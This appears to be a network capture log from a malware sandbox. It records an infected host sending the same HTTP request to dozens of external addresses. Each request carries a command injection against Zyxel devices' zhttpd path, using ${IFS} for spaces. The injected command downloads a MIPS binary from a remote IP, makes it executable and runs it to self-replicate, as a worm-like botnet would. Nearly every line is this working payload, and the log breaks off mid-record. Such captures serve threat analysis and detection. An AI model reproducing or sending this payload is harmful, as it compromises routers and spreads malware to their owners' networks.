                                            Feb 2, 2024 06:21:00.395494938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1302192.168.2.154997490.2.3.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395524025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1303192.168.2.1560692113.9.17.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395561934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1304192.168.2.1560954163.10.142.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395591974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1305192.168.2.153592489.125.230.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395627022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1306192.168.2.155525031.246.251.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395680904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1307192.168.2.1551836159.160.190.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395731926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1308192.168.2.1546932115.137.129.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395735979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1309192.168.2.1540564119.241.88.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395771980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1310192.168.2.1553282139.67.158.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395793915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1311192.168.2.153409649.198.156.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395845890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1312192.168.2.1550528220.169.234.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395878077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1313192.168.2.154132236.156.210.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395912886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1314192.168.2.154388040.225.141.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.395962954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1315192.168.2.1558754117.156.140.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396008015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1316192.168.2.155804082.208.221.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396039009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1317192.168.2.1556460116.106.161.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396075010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1318192.168.2.154007650.193.145.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396100998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1319192.168.2.1549674176.25.126.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396150112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1320192.168.2.155760284.79.72.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396167994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1321192.168.2.1548708113.161.234.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396226883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1322192.168.2.154275439.255.143.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396255970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1323192.168.2.154930832.122.105.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396296024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1324192.168.2.155653680.151.117.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396332026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1325192.168.2.1544970113.173.195.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396369934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1326192.168.2.153722220.72.157.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396405935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1327192.168.2.1548054155.250.19.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396430969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1328192.168.2.155699641.67.30.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396482944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1329192.168.2.153404073.112.119.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396537066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1330192.168.2.155068032.153.23.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396564960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1331192.168.2.1538452171.250.49.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396610022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1332192.168.2.1533824130.252.204.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396616936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1333192.168.2.1540456188.188.194.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396652937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1334192.168.2.1533398161.38.60.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396719933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1335192.168.2.1539590133.37.18.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396744967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1336192.168.2.1534894195.6.253.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396775007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1337192.168.2.1555352151.178.24.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396814108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1338192.168.2.153359631.114.175.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396840096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1339192.168.2.1543560188.187.52.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396888971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1340192.168.2.153481017.204.5.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396923065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1341192.168.2.1559776158.144.138.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.396948099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1342192.168.2.155340644.147.66.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.397001982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1343192.168.2.1559292152.96.76.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.397025108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1344192.168.2.153666252.186.65.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.397068024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1345192.168.2.1560968189.98.224.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.397098064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1346192.168.2.153736661.106.6.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.397135973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1347192.168.2.1545690139.173.190.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.397164106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1348192.168.2.1547684203.41.166.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.397202969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1349192.168.2.1560990134.239.178.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.397236109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1350192.168.2.1538982201.173.60.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.397269964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1351192.168.2.1535376198.61.148.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.397314072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1352192.168.2.1534248157.86.116.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.397358894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1353192.168.2.1541362111.40.50.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.397394896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1354192.168.2.1536686108.86.129.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.397437096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1355192.168.2.1544006222.161.97.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.397460938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1356192.168.2.155354823.152.98.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.397499084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1357192.168.2.153706023.124.92.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.397527933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1358192.168.2.155071459.38.245.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.397578955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1359192.168.2.1554600148.101.70.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.397613049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1360192.168.2.1557960170.208.220.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.397666931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1361192.168.2.1536486167.122.158.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.397694111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1362192.168.2.1550222201.222.7.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.409235001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1363192.168.2.15561728.223.99.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.409271002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1364192.168.2.1553772153.232.94.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.409293890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1365192.168.2.1555688210.158.116.68443
                                            TimestampBytes transferredDirectionData
